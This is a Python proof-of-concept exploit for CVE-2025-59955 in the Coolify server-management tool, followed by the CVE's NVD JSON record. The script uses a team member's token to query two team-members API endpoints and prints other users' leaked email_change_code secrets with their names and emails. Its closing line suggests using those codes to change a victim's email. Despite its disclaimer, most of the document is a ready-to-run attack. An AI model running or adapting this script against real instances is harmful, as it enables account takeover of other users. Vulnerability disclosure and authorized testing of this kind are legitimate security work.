CVE-2025-59955

#!/usr/bin/env python3 """ CVE-2025-59955 PoC - Coolify email_change_code Information Disclosure Note: This is for educational and authorized testing purposes only. """ import requests import json import sys # Configuration TARGET_URL = "https://your-coolify-instance.com" # Replace with your actual authentication token (JWT) AUTH_TOKEN = "your-jwt-token-here" # Replace with the target team_id or use 'current' TEAM_ID = "current" def exploit(): """Exploit the information disclosure vulnerability""" headers = { "Authorization": f"Bearer {AUTH_TOKEN}", "Content-Type": "application/json" } # Target endpoints that leak email_change_code endpoints = [ f"/api/v1/teams/{TEAM_ID}/members", "/api/v1/teams/current/members" ] print("[*] CVE-2025-59955 - Coolify Information Disclosure") print(f"[*] Target: {TARGET_URL}") print() for endpoint in endpoints: url = f"{TARGET_URL}{endpoint}" print(f"[*] Requesting: {endpoint}") try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Success! Received response from {endpoint}") print(f"[+] Status Code: {response.status_code}") # Extract email_change_code from response if isinstance(data, list): for member in data: if 'email_change_code' in member: print(f"[!] LEAKED: email_change_code = {member['email_change_code']}") print(f"[!] For user: {member.get('name', 'Unknown')} ({member.get('email', 'Unknown')})") elif isinstance(data, dict) and 'data' in data: for member in data['data']: if 'email_change_code' in member: print(f"[!] LEAKED: email_change_code = {member['email_change_code']}") print(f"[!] For user: {member.get('name', 'Unknown')} ({member.get('email', 'Unknown')})") # Show full response for analysis print(f"[+] Full response preview:") print(json.dumps(data, indent=2)[:500]) print() elif response.status_code == 401: print(f"[-] Authentication failed (401)") elif response.status_code == 403: print(f"[-] Access denied (403)") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") print("\n[*] Note: Use obtained email_change_code to change victim's email") print("[*] This PoC is for authorized security testing only.") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-59955", "sourceIdentifier": "[email protected]", "published": "2026-01-05T18:15:43.927", "lastModified": "2026-01-12T14:48:13.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Coolify versions prior to and including v4.0.0-beta.420.8 have an information disclosure vulnerability in the `/api/v1/teams/{team_id}/members` and `/api/v1/teams/current/members` API endpoints allows authenticated team members to access a highly sensitive `email_change_code` from other users on the same team. This code is intended for a single-use email change verification and should be kept secret. Its exposure could enable a malicious actor to perform an unauthorized email address change on behalf of the victim. As of time of publication, no known patched versions exist."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}, {"lang": "en", "value": "CWE-212"}, {"lang": "en", "value": "CWE-214"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta428:*:*:*:*:*:*", "matchCriteriaId": "EC99CFF7-91C6-45EF-9031-269E70C12263"}]}]}], "references": [{"url": "https://github.com/coollabsio/coolify/security/advisories/GHSA-927g-56xp-6427", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}